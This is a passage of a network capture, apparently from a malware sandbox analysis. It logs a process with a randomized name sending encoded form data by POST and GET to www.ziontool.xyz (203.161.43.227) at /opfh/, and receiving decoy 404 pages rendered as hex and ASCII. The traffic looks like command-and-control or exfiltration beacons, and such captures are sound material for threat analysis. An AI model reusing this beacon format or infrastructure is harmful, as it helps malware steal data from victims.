May 27, 2024 12:21:52.644598007 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:51 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
May 27, 2024 12:21:52.645451069 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:51 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	63188	203.161.43.227	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:53.799957991 CEST	1744	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.ziontool.xyz Origin: http://www.ziontool.xyz Referer: http://www.ziontool.xyz/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 56 57 45 41 79 2f 77 33 4a 59 6f 31 31 50 68 67 79 58 6f 2f 42 35 79 38 68 33 38 69 35 4d 49 79 64 6a 44 79 64 52 48 49 72 74 4e 70 65 70 6a 37 6c 2b 59 65 6d 6a 71 4b 75 6b 57 4b 4a 77 37 36 6c 51 65 31 38 48 42 67 47 33 35 4b 4f 42 46 6d 32 77 47 4b 4b 2b 54 4e 2b 59 50 44 36 45 32 66 66 64 2f 30 73 50 43 6a 6c 34 74 6e 44 72 41 39 63 31 72 63 4c 50 46 4a 71 62 41 6f 58 4d 36 4d 72 50 6a 68 45 6b 6f 75 59 32 67 34 55 31 67 6f 36 50 53 68 79 38 43 65 36 4b 30 67 75 4a 72 4e 6d 33 53 67 55 4a 2b 6c 66 6f 51 6d 2f 51 51 57 44 32 72 33 7a 2b 44 69 59 6a 59 30 6e 72 38 54 41 4e 34 64 66 64 7a 41 64 62 74 51 36 53 39 47 37 76 47 75 6b 35 38 42 6c 54 32 37 63 78 37 77 59 50 42 6e 68 53 4c 76 48 39 5a 6d 51 5a 59 54 57 44 4e 6d 30 45 48 6b 38 6c 65 48 37 53 4f 47 67 32 65 66 75 76 33 6c 41 77 2f 32 62 4c 4e 4b 30 4c 31 32 7a 54 58 78 6e 4e 43 5a 52 61 44 79 66 2f 66 38 71 36 6a 41 6e 31 78 61 54 50 62 74 77 42 38 64 57 52 4e 48 5a 4d 4b 6e 6b 31 35 4e 30 37 50 57 56 32 72 6c 71 2b 58 5a [TRUNCATED] Data Ascii: R40L6=VWEAy/w3JYo11PhgyXo/B5y8h38i5MIydjDydRHIrtNpepj7l+YemjqKukWKJw76lQe18HBgG35KOBFm2wGKK+TN+YPD6E2ffd/0sPCjl4tnDrA9c1rcLPFJqbAoXM6MrPjhEkouY2g4U1go6PShy8Ce6K0guJrNm3SgUJ+lfoQm/QQWD2r3z+DiYjY0nr8TAN4dfdzAdbtQ6S9G7vGuk58BlT27cx7wYPBnhSLvH9ZmQZYTWDNm0EHk8leH7SOGg2efuv3lAw/2bLNK0L12zTXxnNCZRaDyf/f8q6jAn1xaTPbtwB8dWRNHZMKnk15N07PWV2rlq+XZALpeNUMB7KtZVEABn/mpe5IcO915n2WwN8vgACmNG1H7lZz8UzM0/GiN/rW5IHaDLd+ucNGfrvo8GwxkX84SfAjTg9Mdtvwh0zLITYHe5tMdgYLvJy6gG6Ayq+72R5Pxcsve9huxdHtiWqt+EVk69/0YOahw80ZODboczS3Hm5fQsPcI3zSJauFbcJX+TKiVQZPhfIultnQpbq4NDUc+Wi8LVj6Nltn8rvRZrvlO7VakXjRXh9eIu5S8e21GxeOSW1Uow5riT/MHOd5ZVOuHufrYdeycWkX/rTwwA4yEbRq7xWxlYnw3CPtDlYveVJQIHPr/TBOoJZOZv2QEirrwPxyxyfI8+y5jXlOzCtJba8tJ3zbseCVryRkoB24qSBCXOjwhZ8YOxXevFwQKLGa1L9qUn1B7oLijMewZAlbD0YfHV4fN9YkkkNZ2/D96lPxG8dNg9aE4Z8EI5xI3wekJbuCR00tKdkYtqHQEgqyJWOa7+WaPsyrvqtvhbqohDJS5590/M2qusG1OYbSBpJxV9ILEmQdDu1j3g6set5T4K02UvsbOKoU/jPRJIky2ZO+aHhauExZtLlu/l5ZKNq0687yS9SSJ+IMH25MuTegC26GGjgbYb1kPsio7EZXkl/ZdwMXJdrpOHJi6BeBi9H6YCSJokNeupm0tTV [TRUNCATED]
May 27, 2024 12:21:54.432296038 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:54 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
May 27, 2024 12:21:54.432318926 CEST	1236	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
May 27, 2024 12:21:54.432332039 CEST	448	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
May 27, 2024 12:21:54.432342052 CEST	1236	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 35 36 2e 39 22 20 63 79 3d 22 38 30 35 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="456.9" cy="805.7" r="3.7" transform="translate(-317 296.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="440.5" cy="813.7" r="3.7" transform="translate(-322.5 290.2) rotate(-27.1
May 27, 2024 12:21:54.432354927 CEST	1236	IN	Data Raw: 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 36 2e 38 22 20 63 79 3d 22 38 30 35 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 38 20 33 33 33 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 Data Ascii: <circle cx="536.8" cy="805.3" r="3.7" transform="translate(-308 333.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="539.2" cy="787.7" r="3.7" transform="translate(-299.8 332.3) rotate(-27.1)" style="fill: #ffe029"/> <c
May 27, 2024 12:21:54.432364941 CEST	448	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 31 2e 37 20 33 35 34 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-291.7 354.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="608.2" cy="784.4" r="3.7" transform="translate(-290.7 363.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="612.4" cy="765.8" r=
May 27, 2024 12:21:54.432374954 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
May 27, 2024 12:21:54.432385921 CEST	1236	IN	Data Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
May 27, 2024 12:21:54.432399988 CEST	448	IN	Data Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34 Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
May 27, 2024 12:21:54.432622910 CEST	1236	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
May 27, 2024 12:21:54.437330961 CEST	1236	IN	Data Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	63189	203.161.43.227	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:56.331665039 CEST	456	OUT	GET /opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.ziontool.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:21:56.933429956 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:56 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
May 27, 2024 12:21:56.933455944 CEST	1236	IN	Data Raw: 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 Data Ascii: 98.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 29
May 27, 2024 12:21:56.933466911 CEST	1236	IN	Data Raw: 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e Data Ascii: fe029"/> <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ff
May 27, 2024 12:21:56.933478117 CEST	1236	IN	Data Raw: 20 63 79 3d 22 37 38 34 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 Data Ascii: cy="784" r="3.7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy
May 27, 2024 12:21:56.933490992 CEST	896	IN	Data Raw: 72 61 6e 73 6c 61 74 65 28 2d 33 31 30 2e 39 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d Data Ascii: ranslate(-310.9 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="tr
May 27, 2024 12:21:56.933581114 CEST	1236	IN	Data Raw: 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e Data Ascii: fe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/
May 27, 2024 12:21:56.933600903 CEST	1236	IN	Data Raw: 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 Data Ascii: y="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy
May 27, 2024 12:21:56.933613062 CEST	448	IN	Data Raw: 72 61 6e 73 6c 61 74 65 28 2d 32 37 30 2e 36 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d Data Ascii: ranslate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="tr
May 27, 2024 12:21:56.933626890 CEST	1236	IN	Data Raw: 34 22 20 63 79 3d 22 36 39 31 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c Data Ascii: 4" cy="691.3" r="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8
May 27, 2024 12:21:56.933656931 CEST	1236	IN	Data Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 Data Ascii: sform="translate(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform
